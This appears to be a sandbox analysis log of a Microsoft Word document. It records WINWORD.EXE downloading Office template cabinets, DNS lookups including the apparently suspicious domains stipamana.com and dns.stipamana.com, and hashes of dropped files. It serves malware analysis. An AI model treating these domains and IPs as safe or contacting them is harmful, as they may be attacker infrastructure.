2.19.252.161:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851216.cabtls, httpWINWORD.EXE2.6kB 41.0kB 36 36
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851216.cabHTTP Response
200 -
2.19.252.161:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp0309043001.cabtls, httpWINWORD.EXE13.5kB 322.2kB 215 237
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0309043001.cabHTTP Response
200 -
2.19.252.161:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851217.cabtls, httpWINWORD.EXE1.9kB 39.8kB 25 35
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851217.cabHTTP Response
200 -
2.19.252.161:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403393701.cabtls, httpWINWORD.EXE147.6kB 3.4MB 2103 2469
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851218.cabHTTP Response
200HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403393701.cabHTTP Response
200 -
2.19.252.161:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392701.cabtls, httpWINWORD.EXE83.9kB 2.6MB 1483 1907
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851227.cabHTTP Response
200HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392701.cabHTTP Response
200 -
2.19.252.161:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851219.cabtls, httpWINWORD.EXE1.9kB 40.5kB 24 35
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851219.cabHTTP Response
200 -
2.19.252.161:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392901.cabtls, httpWINWORD.EXE44.3kB 1.9MB 862 1338
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851220.cabHTTP Response
200HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392901.cabHTTP Response
200 -
2.19.252.161:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345746401.cabtls, httpWINWORD.EXE12.5kB 321.0kB 185 235
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851222.cabHTTP Response
200HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345746401.cabHTTP Response
200 -
2.19.252.161:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851223.cabtls, httpWINWORD.EXE2.5kB 40.3kB 35 34
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851223.cabHTTP Response
200 -
2.19.252.161:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851221.cabtls, httpWINWORD.EXE1.8kB 37.6kB 23 33
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851221.cabHTTP Response
200 -
2.19.252.161:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851224.cabtls, httpWINWORD.EXE2.3kB 39.8kB 31 35
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851224.cabHTTP Response
200 -
2.19.252.161:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851225.cabtls, httpWINWORD.EXE2.3kB 37.1kB 31 33
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851225.cabHTTP Response
200 -
2.19.252.161:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp0309043402.cabtls, httpWINWORD.EXE26.8kB 752.6kB 454 545
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0309043402.cabHTTP Response
200 -
2.19.252.161:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp03998159.cabtls, httpWINWORD.EXE103.5kB 3.6MB 1892 2563
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851226.cabHTTP Response
200HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03998159.cabHTTP Response
200 -
2.19.252.161:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328893.cabtls, httpWINWORD.EXE2.1kB 27.3kB 26 25
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328893.cabHTTP Response
200 -
2.19.252.161:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328905.cabtls, httpWINWORD.EXE2.3kB 27.7kB 30 30
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328905.cabHTTP Response
200 -
2.19.252.161:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328908.cabtls, httpWINWORD.EXE2.8kB 40.1kB 41 40
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328908.cabHTTP Response
200 -
2.19.252.161:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345744402.cabtls, httpWINWORD.EXE11.9kB 338.5kB 187 248
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328916.cabHTTP Response
200HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345744402.cabHTTP Response
200 -
2.19.252.161:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345748501.cabtls, httpWINWORD.EXE96.1kB 2.7MB 1624 1959
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328919.cabHTTP Response
200HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328998.cabHTTP Response
200HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345748501.cabHTTP Response
200 -
2.19.252.161:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328932.cabtls, httpWINWORD.EXE1.7kB 26.3kB 18 26
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328932.cabHTTP Response
200 -
2.19.252.161:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328925.cabtls, httpWINWORD.EXE2.4kB 33.2kB 25 32
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328925.cabHTTP Response
200 -
2.19.252.161:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp03998158.cabtls, httpWINWORD.EXE3.5kB 74.2kB 47 59
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328935.cabHTTP Response
200HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03998158.cabHTTP Response
200 -
2.19.252.161:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328940.cabtls, httpWINWORD.EXE2.1kB 27.9kB 20 27
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328940.cabHTTP Response
200 -
2.19.252.161:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328951.cabtls, httpWINWORD.EXE2.1kB 25.6kB 25 25
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328951.cabHTTP Response
200 -
2.19.252.161:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328972.cabtls, httpWINWORD.EXE2.0kB 28.2kB 24 26
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328972.cabHTTP Response
200 -
2.19.252.161:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328975.cabtls, httpWINWORD.EXE2.2kB 29.8kB 28 27
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328975.cabHTTP Response
200 -
2.19.252.161:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328986.cabtls, httpWINWORD.EXE1.6kB 28.1kB 19 26
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328986.cabHTTP Response
200 -
2.19.252.161:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328983.cabtls, httpWINWORD.EXE1.8kB 27.7kB 19 26
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328983.cabHTTP Response
200 -
2.19.252.161:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328990.cabtls, httpWINWORD.EXE2.0kB 26.4kB 24 25
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328990.cabHTTP Response
200 -
2.19.252.161:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345747501.cabtls, httpWINWORD.EXE10.0kB 286.2kB 160 211
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345747501.cabHTTP Response
200 -
2.19.252.161:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345749101.cabtls, httpWINWORD.EXE10.1kB 274.7kB 182 204
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345749101.cabHTTP Response
200 -
2.19.252.161:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345750301.cabtls, httpWINWORD.EXE26.2kB 666.2kB 428 483
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345750301.cabHTTP Response
200 -
2.19.252.161:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345751001.cabtls, httpWINWORD.EXE38.1kB 1.1MB 648 800
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345751001.cabHTTP Response
200 -
2.19.252.161:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345749601.cabtls, httpWINWORD.EXE21.7kB 573.6kB 346 417
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345749601.cabHTTP Response
200 -
2.19.252.161:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345751501.cabtls, httpWINWORD.EXE10.0kB 235.2kB 143 175
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345751501.cabHTTP Response
200 -
2.19.252.161:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403391701.cabtls, httpWINWORD.EXE25.6kB 725.7kB 430 528
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403391701.cabHTTP Response
200 -
2.19.252.161:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403391901.cabtls, httpWINWORD.EXE34.1kB 1.1MB 589 823
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403391901.cabHTTP Response
200 -
2.19.252.161:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392101.cabtls, httpWINWORD.EXE63.8kB 1.9MB 1136 1401
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392101.cabHTTP Response
200 -
2.19.252.161:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392501.cabtls, httpWINWORD.EXE55.4kB 1.4MB 857 987
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392501.cabHTTP Response
200 -
1.0kB 9.2kB 13 11
-
2.19.252.161:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp1000111403.cabtls, httpWINWORD.EXE27.5kB 989.5kB 500 717
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp1000111403.cabHTTP Response
200 -
2.19.252.161:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp1000111502.cabtls, httpWINWORD.EXE9.4kB 244.8kB 145 182
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp1000111502.cabHTTP Response
200 -
701 B 594 B 10 9
-
7.6kB 12.1kB 124 238
-
7.8kB 6.3kB 65 123
-
73 B 159 B 1 1
DNS Request
228.249.119.40.in-addr.arpa
-
73 B 250 B 1 1
DNS Request
roaming.officeapps.live.com
DNS Response
52.109.68.129
-
63 B 79 B 1 1
DNS Request
www.stipamana.com
DNS Response
94.156.167.57
-
61 B 224 B 1 1
DNS Request
r10.o.lencr.org
DNS Response
88.221.134.13788.221.135.10588.221.135.9788.221.134.14488.221.135.11488.221.134.115
-
72 B 146 B 1 1
DNS Request
129.68.109.52.in-addr.arpa
-
73 B 144 B 1 1
DNS Request
95.221.229.192.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
23.159.190.20.in-addr.arpa
-
72 B 132 B 1 1
DNS Request
57.167.156.94.in-addr.arpa
-
73 B 139 B 1 1
DNS Request
168.245.100.95.in-addr.arpa
-
73 B 139 B 1 1
DNS Request
137.134.221.88.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
12.173.189.20.in-addr.arpa
-
73 B 147 B 1 1
DNS Request
196.249.167.52.in-addr.arpa
-
79 B 231 B 1 1
DNS Request
metadata.templates.cdn.office.net
DNS Response
92.123.26.20292.123.26.161
-
79 B 202 B 1 1
DNS Request
binaries.templates.cdn.office.net
DNS Response
2.19.252.1612.19.252.143
-
72 B 137 B 1 1
DNS Request
202.26.123.92.in-addr.arpa
-
71 B 135 B 1 1
DNS Request
161.252.19.2.in-addr.arpa
-
63 B 79 B 1 1
DNS Request
dns.stipamana.com
DNS Response
87.120.121.160
-
73 B 131 B 1 1
DNS Request
160.121.120.87.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
197.87.175.4.in-addr.arpa
-
71 B 145 B 1 1
DNS Request
241.42.69.40.in-addr.arpa
-
69 B 131 B 1 1
DNS Request
92.12.20.2.in-addr.arpa
-
70 B 133 B 1 1
DNS Request
83.210.23.2.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
30.243.111.52.in-addr.arpa
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
706B
MD5d95c58e609838928f0f49837cab7dfd2
SHA155e7139a1e3899195b92ed8771d1ca2c7d53c916
SHA2560407c814aef0d62aec7fd39b7c2f614746f0d8ff41f8ef957736f520f14b0339
SHA512405310b29a833604c6627063bfdcf055a197e01f633ef21da238f1a6415a02e21315d689b4a6669db23e82152bed6f3492afb60963e6b2a0e9bb2ac09a480b5d
-
Filesize
263KB
MD5ff0e07eff1333cdf9fc2523d323dd654
SHA177a1ae0dd8dbc3fee65dd6266f31e2a564d088a4
SHA2563f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5
SHA512b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d
-
Filesize
1KB
MD59d9df2517964d8e049d41515f0d287c3
SHA12cf5f49554bbf0b73930d06b07e2bf12638d60b7
SHA25603cddeda34c46e3bc77be33a37ae97dea02f4a2d6a8e4c3d208ca2bfa5bf242f
SHA512807e30b096381211eebc6399bf879ce6f6aca5e0659a458403d4207f845c42f6a5f40eae8d00d94ad99917d94e4384e407428cd2f1c6837f9e8b12918f85c031
-
Filesize
16B
MD5d29962abc88624befc0135579ae485ec
SHA1e40a6458296ec6a2427bcb280572d023a9862b31
SHA256a91a702aab9b8dd722843d3d208a21bcfa6556dfc64e2ded63975de4511eb866
SHA5124311e87d8d5559248d4174908817a4ddc917bf7378114435cf12da8ccb7a1542c851812afbaf7dc106771bdb2e2d05f52e7d0c50d110fc7fffe4395592492c2f
-
Filesize
134KB
MD5c5782fb8a119d6092f4816b8b39b5fa0
SHA168f2f0c4884168f1d775a6fc0f550150176ec402
SHA256963bb7cbfda00f3033cfed5058521b0a4a42f797cc0e7473b0008ac1416e30e8
SHA512d0809b3e54024cf08af7548525732d642a7ca00b0e8d30310377b4c9e74cc302c3ab926688da7776beabc055ed5bd5ef56d25e82e19e2ea3b6be08ffee214fe3